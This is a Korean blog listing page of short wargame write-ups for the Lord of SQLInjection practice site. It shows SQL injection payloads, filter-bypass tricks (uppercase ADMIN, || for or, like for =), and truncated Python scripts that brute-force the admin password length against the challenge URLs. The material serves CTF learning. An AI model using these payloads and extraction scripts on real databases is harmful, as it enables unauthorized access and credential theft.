전체 글345 golem prob _ . () 필터링 or and substr( = 필터링 1. pw length 구하기 = 대신 like를 사용했다. ' || id like 'admin' && length(pw) like 1# import requests i = 1 while True: url = f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20%7C%7C%20id%20like%20%27admin%27%20%26%26%20length(pw)%20like%20{i}%23" cookies = {"PHPSESSID":""} res = requests.get(url, cookies=cookies) if "Hello admin" in re.. 2021. 10. 2. skeleton prob _ . () 필터링 MySQL에서 and 연산이 or 보다 우선순위가 높다는 것을 알고있다. ?pw=' or id='admin' or id='admin 2021. 10. 2. vampire single quote 안됨 이번엔 바로 전 문제와 달리 대문자를 소문자로 만들 후 진행한다. 또한 admin을 거른다. 하지만 바로 보인다. 2021. 10. 2. troll 따옴표 안됨 admin 안됨 그래놓고 admin 뚫어내라 이 말이지 삽질하다가 롸업봤는데 이렇게 허무할수가.. preg_match에서는 대소문자를 구별하기 때문에 ADMIN은 걸러지지 않는다. 하지만 MySQL은 대소문자를 구별하지 않기 때문에 admin과 ADMIN은 같다. 2021. 10. 2. orge 1. pw length 구하기 import requests i = 1 while True: url = f"https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)={i}%23" cookies = {"PHPSESSID":""} res = requests.get(url, cookies=cookies) if "Hello admin" in res.text: print('pw length : ',i) break i+=1 2. pw 하나하나 구하기 import requests import threading def req_url(i): cookies =.. 2021. 10. 2. darkelf or and 도 필터링 or는 ||와 같다. 왜 이게 바로 생각이 안났을까 ?pw=' || id='admin'# || -> %7C%7C # -> %23 2021. 10. 2. 이전 1 ··· 34 35 36 37 38 39 40 ··· 58 다음
